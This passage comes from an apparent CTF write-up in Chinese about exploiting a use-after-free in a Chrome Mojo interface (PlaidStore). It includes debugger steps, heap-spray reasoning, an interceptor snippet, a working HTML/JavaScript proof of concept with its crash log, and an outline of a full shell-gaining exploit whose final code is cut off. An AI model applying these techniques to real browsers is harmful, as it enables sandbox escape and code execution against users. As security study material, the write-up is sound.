src="/2020/10/mojo/renderFrameHostFuncOffset.png" alt="img"></p></li><li><p>之后，我们就可以精心构建<code>gadget</code>布局。</p><p><img src="/2020/10/mojo/gadgetMap.jpg" alt="img"></p></li><li><p>在布局<code>gadget</code>前还有一个问题：我们该如何在释放<code>render_frame_host_</code>所指向的内存之后，<strong>再将这块内存分配回来</strong>？这里有个小知识点，<strong>chrome中的内存管理使用的是<code>TCMalloc</code>机制</strong>。又因为<code>StoreData</code>函数分配的<code>vector&lt;uint8_t&gt;</code>与<code>render_frame_host_</code>使用的是同一个分配器，<strong>只要大量分配大小与<code>RenderFrameHostImpl</code>相等的<code>vector</code>，就有可能占位成功。</strong></p><blockquote><p>TCMalloc（Thread-Caching Malloc）实现了高效的多线程内存管理，用于替代系统的内存分配相关的函数 - <a href="https://www.jianshu.com/p/11082b443ddf">TCMalloc解密</a></p></blockquote><p>那么<code>sizeof(RenderFrameHostImpl)</code>等于多少呢？我们调试看看。</p><p>首先在<code>content::RenderFrameHostImpl::RenderFrameHostImpl</code>构造函数上下断点，并重新执行</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; b content::RenderFrameHostImpl::RenderFrameHostImpl</span><br><span class="line">pwndbg&gt; r</span><br></pre></td></tr></table></figure><p>我们的目的是找到执行该构造函数的上一个函数，并查看在执行<code>RenderFrameHostImpl</code>构造函数前，执行<code>operator new</code>时传入的大小。</p><blockquote><p>如图所示，我们的目标是<code>content::RenderFrameHostFactory::Create</code>函数。下断并<strong>重新执行</strong>。</p></blockquote><p><img src="/2020/10/mojo/renderFrameHostSize1.png" alt="img"></p><p>单步跟踪<code>RenderFrameHostFactory::Create</code>函数，在整个函数中只有一处地方调用<code>operator new</code>。而这里的<code>0xc28</code>正是<code>RenderFrameHostImpl</code>的大小。</p><p><img src="/2020/10/mojo/renderFrameHostSize.png" alt="img"></p></li><li><p>当我们创建一个<code>child iframe</code>并建立一个<code>PlaidStoreImpl</code>实例后。如果我们关闭这个<code>child iframe</code>，则对应的<code>RenderFrameHost</code>将会<strong>自动关闭</strong>；但于此同时，<code>child iframe</code>所对应的<code>PlaidStoreImpl</code>与browser建立的mojo管道<strong>将会被断开</strong>。<strong>而该管道一但断开，则<code>PlaidStoreImpl</code>实例将会被析构</strong>。</p><p>因此，我们需要在关闭<code>child iframe</code>之前，将管道的<code>remote</code>端移交给<code>parent iframe</code>，使得<code>child iframe</code>的<code>PlaidStoreImpl</code>实例在iframe关闭后仍然存活。</p><blockquote><p>回想一下，正常情况下，当关闭一个iframe时，<strong>RenderFrameHost将会被析构</strong>、<strong>mojo管道将会被关闭</strong>。此时<strong>Mojo管道的关闭一定会带动PlaidStoreImpl的析构</strong>，这样就可以析构掉所有该析构的对象。</p><p>但这里却没有，因为在关闭<code>child iframe</code>前，已经将该<code>iframe</code>所持有的<strong>Mojo管道<code>Remote</code>端</strong>移交出去了，因此在关闭<code>child iframe</code>时将<strong>不会关闭Mojo管道</strong>。而<code>PlaidStoreImpl</code>的生命周期并没有与<code>RenderFrameHost</code>相关联。即<code>RenderFrameHost</code>的析构<strong>完全不影响</strong><code>PlaidStoreImpl</code>实例的生命周期。所以，<code>PlaidStoreImpl</code>实例将不会被析构。</p></blockquote><p>那么，问题是，<strong>该如何移交Mojo管道的<code>remote</code>端呢？</strong> 答案是：使用<code>MojoInterfaceInterceptor</code>。该功能可以拦截来自同一进程中其他<code>iframe</code>的<code>Mojo.bindInterface</code>调用。在<code>child iframe</code>被销毁前，我们可以利用该功能将mojo管道的一端传递给<code>parent iframe</code>。</p><p>以下是来自其他exp的相关代码，我们可以通过该代码片段来了解<code>MojoInterfaceInterceptor</code>的具体使用方式：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">var kPwnInterfaceName = <span class="string">&quot;pwn&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// runs in the child frame</span></span><br><span class="line"><span class="function">function <span class="title">sendPtr</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  var pipe = Mojo.<span class="built_in">createMessagePipe</span>();</span><br><span class="line">  <span class="comment">// bind the InstalledAppProvider with the child rfh</span></span><br><span class="line">  Mojo.<span class="built_in">bindInterface</span>(blink.mojom.InstalledAppProvider.name,</span><br><span class="line">    pipe.handle1, <span class="string">&quot;context&quot;</span>, <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// pass the endpoint handle to the parent frame</span></span><br><span class="line">  Mojo.<span class="built_in">bindInterface</span>(kPwnInterfaceName, pipe.handle0, <span class="string">&quot;process&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// runs in the parent frame</span></span><br><span class="line"><span class="function">function <span class="title">getFreedPtr</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">return</span> <span class="keyword">new</span> <span class="built_in">Promise</span>(<span class="built_in">function</span> (resolve, reject) &#123;</span><br><span class="line">    var frame = <span class="built_in">allocateRFH</span>(window.location.href + <span class="string">&quot;#child&quot;</span>); <span class="comment">// designate the child by hash</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// intercept bindInterface calls for this process to accept the handle from the child</span></span><br><span class="line">    let interceptor = <span class="keyword">new</span> <span class="built_in">MojoInterfaceInterceptor</span>(kPwnInterfaceName, <span class="string">&quot;process&quot;</span>);</span><br><span class="line">    interceptor.oninterfacerequest = <span class="built_in">function</span>(e) &#123;</span><br><span class="line">      interceptor.<span class="built_in">stop</span>();</span><br><span class="line"></span><br><span class="line">      <span class="comment">// bind and return the remote</span></span><br><span class="line">      var provider_ptr = <span class="keyword">new</span> blink.mojom.<span class="built_in">InstalledAppProviderPtr</span>(e.handle);</span><br><span class="line">      <span class="built_in">freeRFH</span>(frame);</span><br><span class="line">      <span class="built_in">resolve</span>(provider_ptr);</span><br><span class="line">    &#125;</span><br><span class="line">    interceptor.<span class="built_in">start</span>();</span><br><span class="line">  &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>现在，我们已经解决了所有潜在的问题，UAF的利用方式应该是这样的</p><ul><li>将<code>child iframe</code>中Mojo 管道的<code>remote</code>端移交至<code>parent iframe</code>，使得Mojo管道仍然保持连接。</li><li>释放<code>child iframe</code></li><li>多次分配内存，使得分配到原先被释放<code>RenderFrameHostImpl</code>的内存区域</li><li>写入目标数据</li><li>执行<code>child iframe</code>对应的<code>PlaidStoreImpl::GetData</code>函数。</li></ul></li><li><p>写个POC验证一下UAF</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- 调用MojoJS接口时一定要将这些js包含入html中 --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">pwn</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> frame = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;iframe&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            frame.<span class="property">srcdoc</span> = <span class="string">`</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;script src=&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;&gt;&lt;\/script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;script src=&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;&gt;&lt;\/script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    var plaidStorePtr = new blink.mojom.PlaidStorePtr();</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    Mojo.bindInterface(</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        blink.mojom.PlaidStore.name,</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        mojo.makeRequest(plaidStorePtr).handle,</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        &quot;context&quot;,</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        true);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    plaidStorePtr.storeData(&quot;aaaa&quot;, new Uint8Array(0x28).fill(0x30));</span></span></span><br><span class="line"><span class="string"><span class="language-javascript"></span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    window.plaidStorePtr = plaidStorePtr;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    console.log(&quot;iframe loaded&quot;);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;\/script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">`</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">appendChild</span>(frame);</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// 在frame加载完成后再异步执行其中的代码</span></span></span><br><span class="line"><span class="language-javascript">            frame.<span class="property">contentWindow</span>.<span class="title function_">addEventListener</span>(<span class="string">&quot;DOMContentLoaded&quot;</span>, <span class="title function_">async</span> () =&gt; &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> childPlaidStorePtr = frame.<span class="property">contentWindow</span>.<span class="property">plaidStorePtr</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">if</span>(childPlaidStorePtr == <span class="literal">undefined</span> || childPlaidStorePtr == <span class="number">0</span>)</span></span><br><span class="line"><span class="language-javascript">                    <span class="keyword">throw</span> <span class="string">&quot;Error in iframe loading&quot;</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;parent iframe start working&quot;</span>)</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 预先分配0xc28</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> buf = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0xc28</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 将原先buffer转为int64位的数组（内存地址不变</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> uaf_buf = <span class="keyword">new</span> <span class="title class_">BigUint64Array</span>(buf);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 将对应vtable entry的前8个字节设置为0xdeadbeef（随便设置的易于区分的值）</span></span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 这样当crash时，$rax一定等于0xdeadbeef。</span></span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">0</span>] = <span class="title class_">BigInt</span>(<span class="number">0xdeadbeef</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 在parent iframe中建立PlaidStoreImpl实例</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> parentPlaidStorePtr = <span class="keyword">new</span> blink.<span class="property">mojom</span>.<span class="title class_">PlaidStorePtr</span>();</span></span><br><span class="line"><span class="language-javascript">                <span class="title class_">Mojo</span>.<span class="title function_">bindInterface</span>(</span></span><br><span class="line"><span class="language-javascript">                    blink.<span class="property">mojom</span>.<span class="property">PlaidStore</span>.<span class="property">name</span>,</span></span><br><span class="line"><span class="language-javascript">                    mojo.<span class="title function_">makeRequest</span>(parentPlaidStorePtr).<span class="property">handle</span>,</span></span><br><span class="line"><span class="language-javascript">                    <span class="string">&quot;context&quot;</span>,</span></span><br><span class="line"><span class="language-javascript">                    <span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 释放child iframe</span></span></span><br><span class="line"><span class="language-javascript">                <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">removeChild</span>(frame);</span></span><br><span class="line"><span class="language-javascript">                frame.<span class="title function_">remove</span>();</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 大量分配内存，用于占位。</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">100</span>; i++)</span></span><br><span class="line"><span class="language-javascript">                    <span class="comment">// 需要注意这里的storeData的索引要变化，不然每次填充数据都只会在一块内存区域上反复填充。</span></span></span><br><span class="line"><span class="language-javascript">                    parentPlaidStorePtr.<span class="title function_">storeData</span>(<span class="string">&quot;1&quot;</span> + i, <span class="keyword">new</span> <span class="title class_">Uint8Array</span>(buf));</span></span><br><span class="line"><span class="language-javascript">                <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;try to uaf crash&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 尝试利用UAF漏洞来Crash</span></span></span><br><span class="line"><span class="language-javascript">                childPlaidStorePtr.<span class="title function_">getData</span>(<span class="string">&quot;aaaa&quot;</span>, <span class="number">0x28</span>);</span></span><br><span class="line"><span class="language-javascript">            &#125;);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">pwn()</span>&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><blockquote><p>不过需要注意的是，在该POC中并没有<strong>将<code>child iframe</code>的Mojo管道一端传递给<code>parent iframe</code></strong> 的操作。因为通过调试可知，<code>child iframe</code>在remove后，其所对应的<code>PlaidStoreImpl</code>实例仍然存在，<strong>并没有随着Mojo pipe的关闭而被析构。</strong></p><p>尚未明确具体原因，但这种情况却简化了漏洞利用的方式。</p></blockquote><p>如下图所示，chrome成功在调用<code>RenderFrameHostImpl::IsRenderFrameLive</code>时Crash，并且<code>$eax</code>为目的值<code>0xdeadbeef</code>。</p><p><img src="/2020/10/mojo/UAFPoc.png" alt="img"></p><p>执行输出的log如下</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Kiprey @ Kipwn in /usr/class/CTFs/mojo [14:34:16] C:1</span></span><br><span class="line">$ ./chrome --headless --disable-gpu --remote-debugging-port=1338 --user-data-dir=./userdata --enable-blink-features=MojoJS,MojoJSTest http://localhost:8000/test.html</span><br><span class="line"></span><br><span class="line">DevTools listening on ws://127.0.0.1:1338/devtools/browser/2aaa5e8e-c088-4b7a-ab69-5dfbace58413</span><br><span class="line">127.0.0.1 - - [09/Oct/2020 14:36:39] <span class="string">&quot;GET /test.html HTTP/1.1&quot;</span> 200 -</span><br><span class="line">[1009/143639.113334:INFO:CONSOLE(14)] <span class="string">&quot;iframe loaded&quot;</span>, <span class="built_in">source</span>: about:srcdoc (14)</span><br><span class="line">[1009/143639.114060:INFO:CONSOLE(32)] <span class="string">&quot;parent iframe start working&quot;</span>, <span class="built_in">source</span>: http://localhost:8000/test.html (32)</span><br><span class="line">[1009/143639.168655:INFO:CONSOLE(54)] <span class="string">&quot;try to uaf crash&quot;</span>, <span class="built_in">source</span>: http://localhost:8000/test.html (54)</span><br><span class="line">Received signal 11 SEGV_MAPERR 0000deadc04f</span><br><span class="line"><span class="comment">#0 0x559d6e9c1579 base::debug::CollectStackTrace()</span></span><br><span class="line"><span class="comment">#1 0x559d6e9256f3 base::debug::StackTrace::StackTrace()</span></span><br><span class="line"><span class="comment">#2 0x559d6e9c1120 base::debug::(anonymous namespace)::StackDumpSignalHandler()</span></span><br><span class="line"><span class="comment">#3 0x7f62fcda4520 (/usr/lib/x86_64-linux-gnu/libpthread-2.29.so+0x1351f)</span></span><br><span class="line"><span class="comment">#4 0x559d6cf2e2d4 content::PlaidStoreImpl::GetData()</span></span><br><span class="line"><span class="comment">#5 0x559d6c901e3a blink::mojom::PlaidStoreStubDispatch::AcceptWithResponder()</span></span><br><span class="line"><span class="comment">#6 0x559d6cf2e9c6 blink::mojom::PlaidStoreStub&lt;&gt;::AcceptWithResponder()</span></span><br><span class="line"><span class="comment">#7 0x559d6eaf5878 mojo::InterfaceEndpointClient::HandleValidatedMessage()</span></span><br><span class="line"><span class="comment">#8 0x559d6eafbcf1 mojo::internal::MultiplexRouter::ProcessIncomingMessage()</span></span><br><span class="line"><span class="comment">#9 0x559d6eafb4de mojo::internal::MultiplexRouter::Accept()</span></span><br><span class="line"><span class="comment">#10 0x559d6eaf2e9c mojo::Connector::DispatchMessage()</span></span><br><span class="line"><span class="comment">#11 0x559d6eaf3941 mojo::Connector::ReadAllAvailableMessages()</span></span><br><span class="line"><span class="comment">#12 0x559d6eb0bd48 mojo::SimpleWatcher::OnHandleReady()</span></span><br><span class="line"><span class="comment">#13 0x559d6e96dbeb base::TaskAnnotator::RunTask()</span></span><br><span class="line"><span class="comment">#14 0x559d6e97e47e base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::DoWorkImpl()</span></span><br><span class="line"><span class="comment">#15 0x559d6e97e211 base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::DoSomeWork()</span></span><br><span class="line"><span class="comment">#16 0x559d6e93b817 base::(anonymous namespace)::WorkSourceDispatch()</span></span><br><span class="line"><span class="comment">#17 0x7f62fc08af1d g_main_context_dispatch</span></span><br><span class="line"><span class="comment">#18 0x7f62fc08b1a0 (/usr/lib/x86_64-linux-gnu/libglib-2.0.so.0.6200.4+0x5019f)</span></span><br><span class="line"><span class="comment">#19 0x7f62fc08b22f g_main_context_iteration</span></span><br><span class="line"><span class="comment">#20 0x559d6e93b672 base::MessagePumpGlib::Run()</span></span><br><span class="line"><span class="comment">#21 0x559d6e97ecf9 base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::Run()</span></span><br><span class="line"><span class="comment">#22 0x559d6e956942 base::RunLoop::Run()</span></span><br><span class="line"><span class="comment">#23 0x559d6cca71f4 content::BrowserMainLoop::RunMainMessageLoopParts()</span></span><br><span class="line"><span class="comment">#24 0x559d6cca90a2 content::BrowserMainRunnerImpl::Run()</span></span><br><span class="line"><span class="comment">#25 0x559d731c5f78 headless::HeadlessContentMainDelegate::RunProcess()</span></span><br><span class="line"><span class="comment">#26 0x559d6e50e306 content::ContentMainRunnerImpl::RunServiceManager()</span></span><br><span class="line"><span class="comment">#27 0x559d6e50dff7 content::ContentMainRunnerImpl::Run()</span></span><br><span class="line"><span class="comment">#28 0x559d6e55c8d3 service_manager::Main()</span></span><br><span class="line"><span class="comment">#29 0x559d6e50c351 content::ContentMain()</span></span><br><span class="line"><span class="comment">#30 0x559d6e55b49d headless::(anonymous namespace)::RunContentMain()</span></span><br><span class="line"><span class="comment">#31 0x559d6e55b19b headless::HeadlessShellMain()</span></span><br><span class="line"><span class="comment">#32 0x559d6bfcdc27 ChromeMain</span></span><br><span class="line"><span class="comment">#33 0x7f62faaf9bbb __libc_start_main</span></span><br><span class="line"><span class="comment">#34 0x559d6bfcda6a _start</span></span><br><span class="line">  r8: 000030791a93d600  r9: 00007ffeb987a3b8 r10: 0000000000000000 r11: 0000000000000000</span><br><span class="line"> r12: 0000000000000028 r13: 0000000000000028 r14: 00007ffeb9879de0 r15: 00007ffeb9879dd0</span><br><span class="line">  di: 000030791a9c5100  si: 00007ffeb9879de0  bp: 00007ffeb9879d60  bx: 000030791aa58ba0</span><br><span class="line">  dx: 0000000000000028  ax: 00000000deadbeef  cx: 00007ffeb9879dd0  sp: 00007ffeb9879d10</span><br><span class="line">  ip: 0000559d6cf2e2d4 efl: 0000000000010202 cgf: 002b000000000033 erf: 0000000000000004</span><br><span class="line"> trp: 000000000000000e msk: 0000000000000000 cr2: 00000000deadc04f</span><br><span class="line">[end of stack trace]</span><br><span class="line">Calling _exit(1). Core file will not be generated.</span><br></pre></td></tr></table></figure></li></ul><h2 id="6-exploit">6. exploit</h2><p>综上所述，整体利用流程是这样的：</p><ul><li><p>先创建一个<code>child iframe</code>，利用OOB泄露该<code>child iframe</code>所对应的<code>PlaidStoreImpl::render_frame_host_</code><strong>指针地址</strong>与<code>chromeELF</code><strong>基地址</strong>。最后，将上面两个地址与任意一个<code>PlaidStoreImpl</code>实例地址一并返回给<code>parent iframe</code>。</p><blockquote><p>注意，此时<strong>最好不要马上释放</strong>该<code>child iframe</code>。暂时先保留<code>render_frame_host_</code>的内存区域，直到最后漏洞利用前再释放，以<strong>减小目标内存区域被其他代码所分配的风险</strong>。</p></blockquote></li><li><p>利用<code>child iframe</code>泄露出的ELF基地址，进一步确认各种gadgets的地址。</p></li><li><p>利用JS代码，先精心构造一块特定的gadgets利用数据。</p></li><li><p>将<code>child iframe</code>持有的Mojo管道<code>remote</code>端移交至<code>parent iframe</code>。</p><blockquote><p>先前的UAF Poc中尽管省略了该操作，但poc仍然可以利用成功，因此该操作在利用过程中不是必须的。</p></blockquote></li><li><p><strong>释放</strong><code>child iframe</code>并<strong>多次</strong>执行<code>parent iframe</code>的<code>PlaidStoreImpl::StoreData</code>函数，将<strong>gadgets利用数据</strong>写入内存中。</p></li><li><p>执行<code>child iframe</code>的<code>PlaidStoreImpl::GetData</code>函数</p></li><li><p>成功获取<code>shell</code>！</p></li></ul><p>所以，综合上面的漏洞POC，我们最终的exp如下所示</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- 调用MojoJS接口时一定要将这些js包含入html中 --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;</span>&gt;</span><span 